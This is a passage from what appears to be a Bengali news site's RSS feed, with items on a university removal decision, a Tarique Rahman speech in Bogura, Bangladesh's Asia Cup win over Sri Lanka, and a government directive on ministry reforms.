বিকালে উপ-উপাচার্য (শিক্ষা) অধ্যাপক মোহা. মাঈন উদ্দিন বলেন, ‘এসব বিষয়ে আমাদের ইতোমধ্যে আলোচনা হয়েছে। আমরা এ বিষয়টি (অপসারণ) নিয়ে আগেও চিন্তাভাবনা করেছি। দাবির পরিপ্রেক্ষিতে আমাদের সিদ্ধান্ত নেওয়াই হয়েছে। আজকে সন্ধ্যায় উপাচার্যের সভায়, না হয় আগামীকাল সিদ্ধান্তটি অফিশিয়ালি জানানো হবে।’

]]>
https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/feed/ 0
সামনের দিনগুলো ভালো নয়, সজাগ থাকুন : তারেক রহমান https://www.dhakaskynews.com/bangladesh/2025/12/22/News_ID-5566/ https://www.dhakaskynews.com/bangladesh/2025/12/22/News_ID-5566/#respond Sun, 21 Dec 2025 19:11:17 +0000 https://www.dhakaskynews.com/?p=5566 বাংলাদেশ জাতীয়তাবাদী দলের (বিএনপি) ভারপ্রাপ্ত চেয়ারম্যান তারেক রহমান বলেছেন, সামনে আমাদের অনেক কাজ, সবাইকে ঐক্যবদ্ধ থাকতে হবে। সেটি আমরা বিএনপির নেতাকর্মীরা হই বা অন্য দলের নেতাকর্মী হোন, যারা গণতন্ত্রে বিশ্বাস করেন- দেশকে সামনে এগিয়ে নেওয়া আমাদের কাজ।
রোববার (২১ ডিসেম্বর) সন্ধ্যায় বগুড়া শহরের শহীদ টিটু মিলনায়তনে জুলাই শহীদদের স্মরণে ডিজিটাল স্মৃতিস্তম্ভ উদ্বোধনী অনুষ্ঠানে ভার্চুয়ালি যুক্ত হয়ে প্রধান অতিথির বক্তব্যে তিনি এসব কথা বলেন।
ইনকিলাব মঞ্চের আহ্বায়ক শহীদ শরিফ ওসমান হাদির বিদেহী আত্মার মাগফিরাত কামনা করে তারেক রহমান বলেন, ওসমান হাদি গণতন্ত্রের পথেই ছিলেন। তিনি একজন প্রার্থী ছিলেন, গণতন্ত্র বা ভোটের রাজনীতিতে বিশ্বাস করতেন। শহীদ হাদির প্রতি, জুলাই শহীদদের ও যোদ্ধাদের প্রতি, ৭১-এর শহীদ ও যোদ্ধাদের প্রতি সম্মান রাখতে হয়, তাহলে আমাদের একটাই লক্ষ্য হতে হবে দেশের মানুষের জন্য শান্তি প্রতিষ্ঠা করা। দেশের জন্য কাজ করা, দেশকে সামনে নিয়ে যাওয়া। আমাদের লক্ষ্য উদ্দেশ্য সামনের দিকে একটাই- ‘করবো কাজ গড়বো দেশ, সবার আগে বাংলাদেশ’।
বিএনপির ভারপ্রাপ্ত চেয়ারম্যান বলেন, স্বৈরাচার সরকার দেশের প্রতিটি সেক্টরকে ধ্বংস করেছিল। আমাদের দেশকে ধ্বংসের কিনারা থেকে গড়ে তুলতে হবে। আমাদের কঠোর পরিশ্রম করতে হবে। সামনের দিনগুলো খুব ভালো দিন নয়, দেশের বিভিন্ন স্থানে অরাজকতা হচ্ছে, কেউ কেউ চেষ্টা করছে- এ বিষয়ে আমাদের সজাগ থাকতে হবে।
তিনি বলেন, আমাদের দেশের প্রায় বিশ কোটি মানুষের জন্য চিকিৎসা ব্যবস্থা গড়ে তুলতে হবে। এদের মধ্যে ভবিষ্যৎ প্রজন্মের জন্য সুন্দর শিক্ষা ব্যবস্থা গড়ে তুলতে হবে। শিক্ষকদের প্রশিক্ষণের ব্যবস্থা করতে হবে। তরুণদের কর্মসংস্থানের ব্যবস্থা করতে হবে। মোট জনগোষ্ঠীর অর্ধেক নারী, এই নারীদের পিছিয়ে থাকলে চলবে না। তাদের শিক্ষিত করাসহ অর্থনৈতিক মজবুত ভিত্তির উপর যাতে দাঁড়াতে পারে সেদিকে কাজ করতে হবে।
তারেক রহমান বলেন, শহীদ জিয়াউর রহমান ধ্বংসের কিনারা থেকে দেশকে বের করে নিয়ে এসেছিলেন। দেশনেত্রী বেগম খালেদা জিয়া উন্নয়নের পথে দেশকে এগিয়ে নিয়েছেন।
জেলা বিএনপির সভাপতি রেজাউল করিম বাদশার সভাপতিত্বে অনুষ্ঠানে বক্তব্য রাখেন- বিএনপি চেয়ারপারসনের উপদেষ্টা পরিষদের সদস্য অ্যাডভোকেট একেএম মাহবুবর রহমান ও হেলালুজ্জামান তালুকদার লালু, সাইফুল ইসলাম, সাবেক এমপি জিএম সিরাজ, সাবেক এমপি কাজী রফিকুল ইসলাম, জেলা বিএনপির ভারপ্রাপ্ত সাধারণ সম্পাদক মোশারফ হোসেন, আলী আজগর তালুকদার হেনা, মাফতুন আহম্মেদ খান রুবেল প্রমুখ।

]]>
https://www.dhakaskynews.com/bangladesh/2025/12/22/News_ID-5566/feed/ 0
লঙ্কানদের হারিয়ে সুপার ফোর শুরু করল বাংলাদেশ https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/ https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/#respond Sun, 21 Sep 2025 05:13:22 +0000 https://www.dhakaskynews.com/?p=5562 টাইগারদের ম্যাচ জেতার জন্য শেষ ওভারে দরকার ছিল ৫ রান। দাসুন শানাকার প্রথম বলেই বাউন্ডারি হাঁকিয়ে রানে সমতা আনেন জাকের আলী। ম্যাচ হয়ে গেছে টাই। পাঁচ বলে তখন মাত্র ১ রানই দরকার। এরপর টানা দুই উইকেট হারিয়ে চাপ বাড়ে বাংলাদেশ শিবিরে। একে একে বিদায় নেন জাকের ও শেখ মেহেদী। তবে পঞ্চম বলে কাঙ্ক্ষিত রানটি তুলে নেন নাসুম আহমেদ। তাতেই সুপার ফোরের প্রথম ম্যাচে শ্রীলঙ্কাকে ৪ উইকেটে হারিয়ে শুভসূচনা করল বাংলাদেশ।

শ্বাসরুদ্ধকর এই জয়ে এশিয়া কাপের ফাইনালের সমীকরণে এগিয়ে গেল বাংলাদেশ। সুপার ফোরে টাইগাররা পরবর্তী দুটি ম্যাচ খেলবে পাকিস্তান ও ভারতের বিপক্ষে। এর যেকোনও একটি ম্যাচ জিতলেও ফাইনালের সমীকরণ উজ্জ্বল হবে বাংলাদেশের।

টাইগাররা দুবাই আন্তর্জাতিক স্টেডিয়ামে শ্রীলঙ্কার দেওয়া ১৬৯ রানের লক্ষ্যে ব্যাট করতে নামে। শুরুতেই দলীয় ১ রানে শূন্য হাতে ফিরে যান তানজিদ হাসান। এরপর লিটন দাসকে সঙ্গে নিয়ে চাপ সামলান সাইফ হাসান। ৩৪ বলে ৫৯ রানের জুটি গড়েন তারা। ব্যক্তিগত ২৩ রানে ফেরেন লিটন। তবে অন্যপ্রান্তে আক্রমণাত্মক ব্যাটিংয়ে ফিফটি তুলে নেন সাইফ। শেষ পর্যন্ত ৪৫ বলে ৬১ রান করে বিদায় নেন তিনি।

এরপর ব্যাট হাতে জ্বলে ওঠেন তাওহিদ হৃদয়। সাম্প্রতিক সময়ে ব্যাটিংয়ে খারাপ সময় কাটালেও এবার দলের প্রয়োজনেই খেলেন দায়িত্বশীল ইনিংস। ৩৭ বলে ৫৮ রানে থেমে যান তিনি। আন্তর্জাতিক টি–টোয়েন্টিতে নিজের চতুর্থ ফিফটি তুলে নেওয়ার পাশাপাশি স্পর্শ করেন এক হাজার রানের মাইলফলকও। শেষদিকে কিছুটা নাটকীয়তা তৈরি হলেও শামীম ও নাসুমে জয় নিয়েই মাঠ ছাড়ে বাংলাদেশ। এতে সুপার ফোর পর্বে আত্মবিশ্বাসী সূচনা হলো টাইগারদের।

টস হেরে ব্যাট করতে নেমে নির্ধারিত ২০ ওভারে ৬ উইকেটে ১৬৮ রান তোলেন লঙ্কানরা। ইনিংসের শুরুতে ঝড়ো ব্যাটিংয়ে দলকে এগিয়ে নেন কুশল মেন্ডিস ও পাথুম নিশাঙ্কা। তবে তাসকিন আহমেদ আঘাত হানেন প্রথমে, এরপর শেখ মেহেদী ফিরিয়ে দেন মেন্ডিস ও মিশরাকে। মাঝপথে লঙ্কানরা ব্যাটিংয়ে থমকে গেলেও শেষ দিকে দারুণ ঝড় তোলেন দাসুন শানাকা। ৩৭ বলে অপরাজিত ৬৪ রানের ইনিংসে ভর করে চ্যালেঞ্জিং সংগ্রহ পায় লঙ্কানরা। তাকে সঙ্গ দেন চারিথ আসালঙ্কা, ১২ বলে করেন ২১ রান। বাংলাদেশের হয়ে সেরা বোলার মুস্তাফিজুর রহমান ১৯ রানে নেন ৩ উইকেট। শেখ মেহেদীর ঝুলিতে গেছে ২টি।

২৪ সেপ্টেম্বর সুপার ফোরে বাংলাদেশের দ্বিতীয় ম্যাচে প্রতিপক্ষ ভারত।

]]>
https://www.dhakaskynews.com/sports/2025/09/21/News_ID-5562/feed/ 0
মন্ত্রণালয়গুলোর অভ্যন্তরীণ সংস্কারের তথ্য জনগণকে জানানোর নির্দেশ https://www.dhakaskynews.com/bangladesh/2025/09/18/News_ID-5559/ https://www.dhakaskynews.com/bangladesh/2025/09/18/News_ID-5559/#respond Thu, 18 Sep 2025 15:30:51 +0000 https://www.dhakaskynews.com/?p=5559 অন্তর্বর্তী সরকারের গঠিত সংস্কার কমিশনগুলো যেসব সুপারিশ করেছে তার বাইরে মন্ত্রণালয়গুলো নিজেদের উদ্যোগে কী কী সংস্কার এনেছে তা জনগণকে জানাতে প্রধান উপদেষ্টা অধ্যাপক মুহাম্মদ ইউনূস নির্দেশ দিয়েছেন।

প্রধান উপদেষ্টার সভাপতিত্বে ১৮ সেপ্টেম্বর বৃহস্পতিবার তার কার্যালয়ে অনুষ্ঠিত উপদেষ্টা পরিষদের বৈঠকে সব মন্ত্রণালয়ের দায়িত্বশীলদের এ নির্দেশ তিনি। উপদেষ্টা পরিষদের বৈঠকের পর রাজধানীর ফরেন সার্ভিস একাডেমিতে আয়োজিত সংবাদ সম্মেলনে এ তথ্য জানান প্রধান উপদেষ্টার প্রেস সচিব শফিকুল আলম।

শফিকুল আলম জানান, সংস্কার কমিশনের সুপারিশের বাইরেও সব মন্ত্রণালয় এবং বিভাগ বিভিন্ন বিষয়ে গুরুত্বপূর্ণ সংস্কার পদক্ষেপ নিচ্ছে, এসব বিষয় জনগণকে জানানোর জন্য প্রত্যেক মন্ত্রণালয় ‍ও বিভাগকে প্রধান উপদেষ্টা নির্দেশ দিয়েছেন।

প্রেস সচিব জানান, সংস্কার কমিশনগুলোর সংস্কার প্রস্তাবের মধ্যে প্রথম দিকের ১২১টির মধ্যে ৭৭টিকে অতি-গুরুত্বপূর্ণ হিসেবে চিহ্নিত করা হয়েছে, যার মধ্যে ২৪টি বাস্তবায়ন হয়েছে, বাকিগুলো বাস্তবায়নাধীন আছে।

এ ছাড়াও, আজকের উপদেষ্টা পরিষদের বৈঠকে নির্বাচন কমিশন সচিবালয় (সংশোধন) অধ্যাদেশ-২০২৫ এবং নির্বাচন কর্মকর্তা (বিশেষ বিধান) (সংশোধন) অধ্যাদেশ-২০২৫ এর খসড়ায় নীতিগত ও চূড়ান্ত অনুমোদন দিয়েছে উপদেষ্টা পরিষদ।

এর বাইরে অর্থ সংক্রান্ত কতিপয় আইন (দ্বিতীয় সংশোধন) অধ্যাদেশ-২০২৫ এর খসড়াও অনুমোদন দেওয়া হয়েছে।

]]>
https://www.dhakaskynews.com/bangladesh/2025/09/18/News_ID-5559/feed/ 0